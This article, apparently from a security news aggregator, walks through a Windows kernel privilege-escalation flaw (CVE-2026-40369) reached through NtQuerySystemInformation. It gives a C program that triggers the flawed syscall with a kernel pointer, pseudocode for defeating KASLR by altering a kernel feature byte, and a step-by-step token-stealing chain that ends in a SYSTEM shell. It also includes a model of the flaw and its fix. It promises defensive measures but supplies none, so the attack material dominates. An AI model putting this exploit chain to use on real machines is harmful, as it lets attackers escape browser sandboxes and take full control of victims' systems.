CVE-2026-40369 Exploit in the Wild: Single Syscall Grants SYSTEM from Browser Sandbox + Video


Introduction:

A newly disclosed Windows Kernel vulnerability, identified as CVE-2026-40369, has sent shockwaves through the cybersecurity community. Discovered by researcher Ori Nimron, this flaw allows an unprivileged attacker, even one confined within a modern browser sandbox like Chrome or Edge, to achieve full SYSTEM-level privileges on affected Windows 11 systems (versions 24H2 and 25H2). The vulnerability lies in a logic bypass within the heavily-audited `NtQuerySystemInformation` syscall, transforming a seemingly innocuous kernel function into a powerful, 100% deterministic local privilege escalation (LPE) primitive. This article dissects the technical root cause, provides step-by-step analysis, and outlines defensive measures for this critical threat.

Learning Objectives:

– Understand the root cause of CVE-2026-40369, specifically the logic flaw in `ExpGetProcessInformation` and the `ProbeForWrite` bypass.
– Learn how to trigger the vulnerability and analyze the resulting crash or controlled kernel memory write.
– Explore the exploitation chain used to escape a browser sandbox and escalate privileges to SYSTEM, including KASLR bypass techniques.

You Should Know:

1. Root Cause Analysis: The 12-byte Write Primitive

The vulnerability is triggered by a specific call to the `NtQuerySystemInformation` syscall. When called with information class `253` (`SystemProcessInformationExtension`) and a zero-length buffer, a critical validation step is skipped, allowing a user-supplied kernel pointer to be used directly without proper checks.

The Flawed Code Path: The `ProbeForWrite` function in the kernel is responsible for validating that a user-mode buffer is safe to write to. However, its body is bypassed entirely when the `Length` parameter is `0`. The syscall handler for class `253` then passes this unchecked pointer down to the `ExpGetProcessInformation` function.
The Unchecked Write: Inside `ExpGetProcessInformation`, for every running process on the system, the function attempts to increment three adjacent `DWORD` (4-byte) values at the user-supplied address. Since the address is never validated to be in user mode, an attacker can point it to any writable kernel memory address.
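To make the root cause concrete, here is an added model of the probe/handler interaction the two paragraphs above describe. It is not the article's code and not Windows kernel code: the address split, the two mapped addresses, the `translate()` "page table" and the process count are all constructed for illustration. The vulnerable probe returns before looking at the address when `Length` is `0`; the vulnerable handler then increments three adjacent DWORDs at the caller's pointer once per process. The hardened path shows the two fixes a reviewer would ask for: the probe rejects a kernel address regardless of length, and the handler probes the number of bytes it is actually about to write, not the number the caller claimed.

```c
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>

/* Constructed model of the ProbeForWrite / ExpGetProcessInformation flaw.
 * All addresses, names and the memory layout are hypothetical. */

typedef int NTSTATUS;
#define STATUS_SUCCESS           0
#define STATUS_ACCESS_VIOLATION  (-1)
#define STATUS_PAGE_FAULT        (-2)   /* stands in for the BSOD on an unmapped address */

/* Hypothetical x64-style split: user addresses end at USER_LIMIT. */
#define USER_LIMIT    0x00007FFFFFFFFFFFULL
#define USER_BUF_VA   0x0000000000010000ULL  /* constructed user-mode buffer */
#define KERNEL_VAR_VA 0xFFFFF80000001000ULL  /* constructed kernel-mode variable */

#define WRITE_DWORDS 3   /* the handler increments three adjacent DWORDs (12 bytes) */

static uint32_t user_buf[WRITE_DWORDS];
static uint32_t kernel_var[WRITE_DWORDS];

void reset_memory(void) {
    for (int i = 0; i < WRITE_DWORDS; i++) { user_buf[i] = 0; kernel_var[i] = 0; }
}

/* Tiny "page table": maps the two constructed virtual addresses to storage. */
static uint32_t *translate(uint64_t va) {
    if (va == USER_BUF_VA)   return user_buf;
    if (va == KERNEL_VAR_VA) return kernel_var;
    return NULL;
}

/* Model of the flawed probe: a zero-length request returns before the
 * address range is examined, so a kernel pointer passes unchecked. */
NTSTATUS probe_for_write_vulnerable(uint64_t addr, size_t len) {
    if (len == 0) return STATUS_SUCCESS;                 /* the bypass */
    if (addr > USER_LIMIT || addr + len - 1 > USER_LIMIT) return STATUS_ACCESS_VIOLATION;
    return STATUS_SUCCESS;
}

/* Hardened probe: a kernel address is rejected whatever the length. */
NTSTATUS probe_for_write_hardened(uint64_t addr, size_t len) {
    if (addr > USER_LIMIT) return STATUS_ACCESS_VIOLATION;
    if (len != 0 && addr + len - 1 > USER_LIMIT) return STATUS_ACCESS_VIOLATION;
    return STATUS_SUCCESS;
}

typedef NTSTATUS (*probe_fn)(uint64_t addr, size_t len);

/* Model of the class-253 handler: once the probe passes, bump three DWORDs
 * at the caller's pointer once per running process. */
static NTSTATUS handler(probe_fn probe, size_t probe_len, uint64_t ptr, unsigned process_count) {
    NTSTATUS st = probe(ptr, probe_len);
    if (st != STATUS_SUCCESS) return st;
    uint32_t *mem = translate(ptr);
    if (!mem) return STATUS_PAGE_FAULT;                  /* unmapped: the real kernel bluescreens here */
    for (unsigned p = 0; p < process_count; p++)
        for (int i = 0; i < WRITE_DWORDS; i++) mem[i]++;
    return STATUS_SUCCESS;
}

/* Vulnerable path: probes whatever length the caller claims (0 in the bug). */
NTSTATUS query_vulnerable(uint64_t ptr, size_t caller_len, unsigned process_count) {
    return handler(probe_for_write_vulnerable, caller_len, ptr, process_count);
}

/* Fixed path: probes the size the handler will actually write, with the
 * hardened probe, regardless of the caller-supplied length. */
NTSTATUS query_fixed(uint64_t ptr, size_t caller_len, unsigned process_count) {
    (void)caller_len;
    return handler(probe_for_write_hardened, WRITE_DWORDS * sizeof(uint32_t), ptr, process_count);
}

uint32_t kernel_var_value(int i) { return kernel_var[i]; }
uint32_t user_buf_value(int i)   { return user_buf[i]; }

int main(void) {
    reset_memory();
    NTSTATUS st = query_vulnerable(KERNEL_VAR_VA, 0, 5);
    printf("vulnerable path, kernel pointer, len 0: status %d, kernel_var[0]=%u\n", st, kernel_var[0]);
    reset_memory();
    st = query_fixed(KERNEL_VAR_VA, 0, 5);
    printf("fixed path, kernel pointer, len 0: status %d, kernel_var[0]=%u\n", st, kernel_var[0]);
    return 0;
}
```

Running it shows the kernel-mode DWORDs incremented once per process on the vulnerable path and an access violation with untouched memory on the fixed path; passing a nonzero length to the vulnerable path also fails, which is exactly why only the zero-length call is useful to an attacker.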

Step‑by‑step guide to triggering the vulnerability (Conceptual Code Snippet):

This code demonstrates how a low-privileged process can trigger the arbitrary kernel address increment. This example aims to cause a controlled crash by targeting a NULL pointer, illustrating the primitive’s power.

```c
// WARNING: This is for educational purposes only. Running this on an unpatched system will cause a BSOD.
#include <windows.h>
#include <winternl.h>   // NTSTATUS
#include <stdio.h>

// Define the system information class (253)
#define SystemProcessInformationExtension 253

// Define function pointer type for NtQuerySystemInformation
typedef NTSTATUS (NTAPI *pNtQuerySystemInformation)(
    ULONG SystemInformationClass,
    PVOID SystemInformation,
    ULONG SystemInformationLength,
    PULONG ReturnLength
);

int main(void) {
    HMODULE hNtdll = GetModuleHandleA("ntdll.dll");
    if (!hNtdll) {
        printf("Failed to get ntdll.dll handle.\n");
        return 1;
    }
    pNtQuerySystemInformation pfnNtQuerySystemInformation =
        (pNtQuerySystemInformation)GetProcAddress(hNtdll, "NtQuerySystemInformation");
    if (!pfnNtQuerySystemInformation) {
        printf("Failed to get NtQuerySystemInformation address.\n");
        return 1;
    }

    // Target a kernel address. Using 0x1 (or any invalid address) will cause a crash.
    // A real exploit would target a valid, writable kernel structure.
    PVOID kernelAddress = (PVOID)0x1;
    ULONG returnLength = 0;

    printf("Triggering vulnerability with kernel address: %p\n", kernelAddress);

    // Trigger the bug: call with class 253, the unchecked address, and length 0.
    NTSTATUS status = pfnNtQuerySystemInformation(
        SystemProcessInformationExtension,
        kernelAddress,
        0,
        &returnLength
    );

    // The call will likely cause a PAGE_FAULT_IN_NONPAGED_AREA (0x50) BSOD before returning.
    printf("Status: 0x%08X\n", (unsigned int)status);
    return 0;
}
```

Windows Analysis Commands (for debugging):

To analyze this crash or a memory dump, use WinDbg to inspect the faulting instruction and the kernel pointer being dereferenced.

After the system crashes, open the memory.dmp file in WinDbg and run:

```
!analyze -v
```

This shows the faulting instruction and the memory address that was referenced (Arg1). Expected output for the near-NULL dereference triggered above:

```
PAGE_FAULT_IN_NONPAGED_AREA (50)
Arg1: 0000000000000001, memory referenced.
```

You can then disassemble the code around the faulting instruction:

```
u @rip-10 L10
```

This reveals the `inc dword ptr [...]` instruction that caused the fault.

2. From Crash to Kernel Read: Bypassing KASLR

A raw increment primitive is powerful but blind. To build a reliable exploit, an attacker first needs to defeat Kernel Address Space Layout Randomization (KASLR) to locate critical kernel structures (like the `EPROCESS` token). The CVE-2026-40369 exploit chains the write primitive with a separate information leak.

Leveraging the Write Primitive: The first step is to use the `NtQuerySystemInformation` bug to carefully modify a specific byte in a kernel feature state (`Feature_RestrictKernelAddressLeaks`). By changing this value, the attacker can re-enable deprecated, information-leaking system information classes.
Achieving Kernel Read: Once the leak is re-enabled, a separate call to `NtQuerySystemInformation` (e.g., with class `SystemModuleInformation`) will return sensitive kernel addresses, including the base address of `ntoskrnl.exe`. This completely defeats KASLR.

Step‑by‑step guide to the KASLR bypass concept:

This Python-like pseudocode outlines the logical steps an exploit would take to disable the kernel leak mitigation and obtain a kernel base address.

```python
# PSEUDO-CODE for KASLR bypass using CVE-2026-40369

# 1. The target address of the feature byte (offset varies by build).
feature_byte_address = ntoskrnl_base_guess + offset_of_Feature_RestrictKernelAddressLeaks

# 2. Use the vulnerability to increment the target address.
#    Incrementing the value once will change its state.
#    For example, changing a value from 0x57 to 0x58 might disable the feature.
call_nt_query_system_information(class=253, buffer=feature_byte_address, length=0)

# 3. After the feature is disabled, call a leaking information class.
#    The kernel now no longer sanitizes the output for this class.
buffer = allocate_buffer(0x1000)
return_length = 0
call_nt_query_system_information(class=11, buffer=buffer, length=0x1000, return_length)  # Class 11 = SystemModuleInformation

# 4. Parse the returned buffer to extract the kernel base address.
kernel_base = parse_system_module_information(buffer)
print(f"[+] Kernel base address leaked: {hex(kernel_base)}")
```

3. Token Stealing: The Final Ascent to SYSTEM

With a kernel read/write primitive and a known kernel base address, the final step is classic token stealing. The attacker leverages the arbitrary increment to corrupt a system structure, granting their process the highest level of privilege.

Locating the Target: Using the leaked kernel base, the exploit locates the `PsInitialSystemProcess` symbol. This points to the `EPROCESS` structure of the SYSTEM process (PID 4). From there, it can locate the `EPROCESS` structure for the attacker’s own process.
The Token Swap: Inside the `EPROCESS` structure is a field pointing to the process’s security token (`Token`). The exploit uses its arbitrary kernel write primitive to overwrite its own process’s token pointer with the pointer to the SYSTEM process token. Once the token is swapped, the attacker’s process inherits the full privileges of SYSTEM.

Step‑by‑step guide to the privilege escalation chain (Command List):

This is a high-level sequence of commands and operations an exploit would perform to achieve SYSTEM.

[Attacker's Process, Low/Medium Integrity]

1. [Information Leak Phase]
> Trigger CVE-2026-40369 to modify Feature_RestrictKernelAddressLeaks byte.
> Call NtQuerySystemInformation with class 11.
> Parse response to get ntoskrnl.exe base address (e.g., 0xfffff800`66200000).

2. [Structure Discovery Phase]
> Calculate offset to PsInitialSystemProcess from leak (e.g., +0x1234567).
> Read kernel memory at that address to get SYSTEM EPROCESS pointer.
> Traverse EPROCESS linked list to find our own process's EPROCESS.

3. [Token Swapping Phase]
> From SYSTEM's EPROCESS, read the Token pointer (at offset +0x4b8).
> Calculate the address of the Token field in our own EPROCESS.
> Use the write primitive to overwrite our token with the SYSTEM token.

4. [Verification Phase]
> Call CreateProcess to spawn a new cmd.exe shell.
> The new shell will run with NT AUTHORITY\SYSTEM privileges.
> whoami
> nt authority\system

What Undercode Says:

– The disclosure of CVE-2026-40369 shatters the illusion that heavily audited, legacy code paths are inherently secure, revealing a profound logic flaw that allowed a single syscall to bypass decades of kernel hardening. The exploit is not just a theoretical bypass but a “100% deterministic” tool, meaning it will work reliably every time it is run, a nightmare for defenders who rely on probabilistic exploit mitigation.
– The most alarming aspect is its reachability from a browser’s renderer sandbox, as the `NtQuerySystemInformation` syscall is intentionally left unblocked. This effectively collapses the security boundaries between the web and the operating system, turning a browser compromise into an immediate and trivial total system takeover.

Prediction:

– The existence of a functional, deterministic exploit at the Pwn2Own level will accelerate Microsoft’s patch cycle. However, due to the complexity of the `ntoskrnl.exe` codebase, we can expect to see several incomplete or bypassed patches for this vulnerability class in the coming months.
– The publication of the full exploit chain and the `prefetch-tool` on GitHub has dramatically lowered the barrier to entry for kernel exploitation. Script-kiddies and less sophisticated threat actors will quickly weaponize this into a reliable, plug-and-play tool, leading to a surge in LPE attacks in the short term.


IT/Security Reporter URL:

Reported By: [Aleborges Vulnerability](https://www.linkedin.com/posts/aleborges_vulnerability-informationsecurity-exploitation-share-7465399045960773632-lkEQ/) – Hackers Feeds